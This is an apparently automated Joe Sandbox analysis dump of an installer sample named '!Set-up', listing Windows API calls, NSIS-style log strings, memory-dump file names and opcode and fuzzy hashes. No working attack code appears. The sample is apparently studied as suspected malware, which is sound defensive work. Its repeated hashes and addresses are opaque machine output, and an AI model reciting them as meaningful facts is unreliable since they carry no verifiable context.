                                                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047A0
                                                                • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00427976,759223A0,00000000), ref: 00406902
                                                              • SetDlgItemTextW.USER32(00000000,00000400,0040A264), ref: 00404819
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                              • String ID: F$A
                                                              • API String ID: 3347642858-1281894373
                                                              • Opcode ID: 9d23a5a8c0223ae690e18e5715e7d3cdc314298ad832e99d2ae59d35dee8c45f
                                                              • Instruction ID: 610cab7253faed09e83e35c18a41c8795a2522a57bd741f73bb79fe4ae4f2c97
                                                              • Opcode Fuzzy Hash: 9d23a5a8c0223ae690e18e5715e7d3cdc314298ad832e99d2ae59d35dee8c45f
                                                              • Instruction Fuzzy Hash: A3B181B1900209BBDB11AFA1CC85AAF7BB8EF45315F10843BFA05B72D1D77C9A418B59
                                                              APIs
                                                              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                              • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F5C
                                                              • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FD5
                                                              • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FE1
                                                              • lstrcmpA.KERNEL32(name,?), ref: 00406FF3
                                                              • CloseHandle.KERNEL32(?), ref: 00407212
                                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                              • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                              • API String ID: 1916479912-1189179171
                                                              • Opcode ID: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                              • Instruction ID: 0b41acfa2c3272d6dc61f6848418d9961a63ce1f0aee58dce5ac99f5834af97b
                                                              • Opcode Fuzzy Hash: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                              • Instruction Fuzzy Hash: 8491CB70D1412DAADF05EBE5C9908FEBBBAEF58301F00406AF592F7290E2385A05DB75
APIs
• CoCreateInstance.OLE32(0040AC30,?,00000001,0040AC10,?), ref: 0040257E
Strings
• CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
Memory Dump Source
• Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
Similarity
• API ID: CreateInstance
• String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
• API String ID: 542301482-1377821865
• Opcode ID: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
• Instruction ID: 17e7a05f0d3b91d3be5025a92c0a08315d4604efbe7233a371b14ee5b096337f
• Opcode Fuzzy Hash: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
• Instruction Fuzzy Hash: 9E416E74A00205BFCB04EFA0CC99EAE7B79EF48314B20456AF915EB3D1C679A941CB54
Memory Dump Source
• Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
• Instruction ID: f621f802e1b16f1afd83cb625a9a5dfb13386b99c5f5a138cca70abed5397206
• Opcode Fuzzy Hash: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
• Instruction Fuzzy Hash: CEE17A71D04218DFCF14CF94D980AAEBBB1AF45301F1981ABEC55AF286D738AA41CF95
Memory Dump Source
• Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
• Instruction ID: 563abc6a1943806f9f153a5c0538de096a4a033458f435c3a5efc50f2cd88ab2
• Opcode Fuzzy Hash: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
• Instruction Fuzzy Hash: 67C16831A042598FCF18CF68C9805ED7BA2FF89314F25862AED56A7384E335BC45CB85
APIs
• GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063EB
• lstrlenW.KERNEL32(?), ref: 004063F8
• GetVersionExW.KERNEL32(?), ref: 00406456
  • Part of subcall function 00406057: CharUpperW.USER32(?,0040642D,?), ref: 0040605D
• LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406495
• GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004064B4
• GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004064BE
• GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004064C9
• FreeLibrary.KERNEL32(00000000), ref: 00406500
• GlobalFree.KERNEL32(?), ref: 00406509
Strings
Memory Dump Source
• Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
Similarity
• API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
• String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
• API String ID: 20674999-2124804629
• Opcode ID: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
• Instruction ID: cf04814c2eceeca0522e3a2239a4cfb7588c45c97b625e8eb28f179f7b3afb0e
• Opcode Fuzzy Hash: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
• Instruction Fuzzy Hash: D3919371900219EBDF119FA4CD88AAEBBB8EF04705F11807AE906F7191DB788E51CF59
APIs
• CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404199
• GetDlgItem.USER32(?,000003E8), ref: 004041AD
• SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004041CA
• GetSysColor.USER32(?), ref: 004041DB
• SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041E9
• SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041F7
• lstrlenW.KERNEL32(?), ref: 00404202
• SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040420F
• SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040421E
  • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404150,?), ref: 0040400D
  • Part of subcall function 00403FF6: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404150,?), ref: 0040401C
  • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404150,?), ref: 00404030
• GetDlgItem.USER32(?,0000040A), ref: 00404276
• SendMessageW.USER32(00000000), ref: 0040427D
• GetDlgItem.USER32(?,000003E8), ref: 004042AA
• SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042ED
• LoadCursorW.USER32(00000000,00007F02), ref: 004042FB
• SetCursor.USER32(00000000), ref: 004042FE
• ShellExecuteW.SHELL32(0000070B,open,0046E220,00000000,00000000,00000001), ref: 00404313
• LoadCursorW.USER32(00000000,00007F00), ref: 0040431F
• SetCursor.USER32(00000000), ref: 00404322
• SendMessageW.USER32(00000111,00000001,00000000), ref: 00404351
• SendMessageW.USER32(00000010,00000000,00000000), ref: 00404363
Strings
Memory Dump Source
• Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
Similarity
• API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
• String ID: F$N$open
• API String ID: 3928313111-1104729357
• Opcode ID: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
• Instruction ID: b74f7aac3d4bcd21dc7a54326fe4aeb8052e912a1eb6d084c2fa05dc76f75ebb
• Opcode Fuzzy Hash: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
• Instruction Fuzzy Hash: 5D71B5F1A00209BFDB109F65DD45EAA7B78FB44305F00853AFA05B62E1C778AD91CB99
                                                              APIs
                                                              • lstrcpyW.KERNEL32(00465E20,NUL,?,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AD5
                                                              • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AF4
                                                              • GetShortPathNameW.KERNEL32(000000F1,00465E20,00000400), ref: 00406AFD
                                                                • Part of subcall function 00405DE2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                • Part of subcall function 00405DE2: lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                              • GetShortPathNameW.KERNEL32(000000F1,0046B478,00000400), ref: 00406B1E
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00465E20,000000FF,00466620,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B47
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,0046B478,000000FF,00466C70,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B5F
                                                              • wsprintfA.USER32 ref: 00406B79
                                                              • GetFileSize.KERNEL32(00000000,00000000,0046B478,C0000000,00000004,0046B478,?,?,00000000,000000F1,?), ref: 00406BB1
                                                              • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406BC0
                                                              • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BDC
                                                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406C0C
                                                              • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00467070,00000000,-0000000A,0040A87C,00000000,[Rename]), ref: 00406C63
                                                                • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                              • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C77
                                                              • GlobalFree.KERNEL32(00000000), ref: 00406C7E
                                                              • CloseHandle.KERNEL32(?), ref: 00406C88
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                              • String ID: ^F$%s=%s$NUL$[Rename]$plF
                                                              • API String ID: 565278875-3368763019
                                                              • Opcode ID: c66772e8c78fc620be6d4cc5b43e883a49b8d8bdc18a99bb2091202eebcb1dd4
                                                              • Instruction ID: 187392fb1a539ff374a899d42f74550c270b9899c721d3c7d9f4fe98b52eb23c
                                                              • Opcode Fuzzy Hash: c66772e8c78fc620be6d4cc5b43e883a49b8d8bdc18a99bb2091202eebcb1dd4
                                                              • Instruction Fuzzy Hash: F2414B322082197FE7206B61DD4CE6F3E6CDF4A758B12013AF586F21D1D6399C10867E
                                                              APIs
                                                              • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                              • BeginPaint.USER32(?,?), ref: 00401047
                                                              • GetClientRect.USER32(?,?), ref: 0040105B
                                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                              • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                              • DeleteObject.GDI32(?), ref: 004010F6
                                                              • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                              • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                              • SelectObject.GDI32(00000000,?), ref: 00401149
                                                              • DrawTextW.USER32(00000000,00476AA0,000000FF,00000010,00000820), ref: 0040115F
                                                              • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                              • DeleteObject.GDI32(?), ref: 0040116E
                                                              • EndPaint.USER32(?,?), ref: 00401177
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                              • String ID: F
                                                              • API String ID: 941294808-1304234792
                                                              • Opcode ID: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                              • Instruction ID: 3a901b8e11bd10f40e8c3d59bf329074d7a31f92ad936af625f7db958ebfa50f
                                                              • Opcode Fuzzy Hash: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                              • Instruction Fuzzy Hash: BF518772800209AFCF05CF95DD459AFBBB9FF45315F00802AF952AA1A1C738EA50DFA4
                                                              APIs
                                                              • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                              • lstrlenW.KERNEL32(004140F8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                              • RegSetValueExW.ADVAPI32(?,?,?,?,004140F8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                              • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                              Strings
                                                              • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                              • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                              • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                              • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                              • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                              • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmp
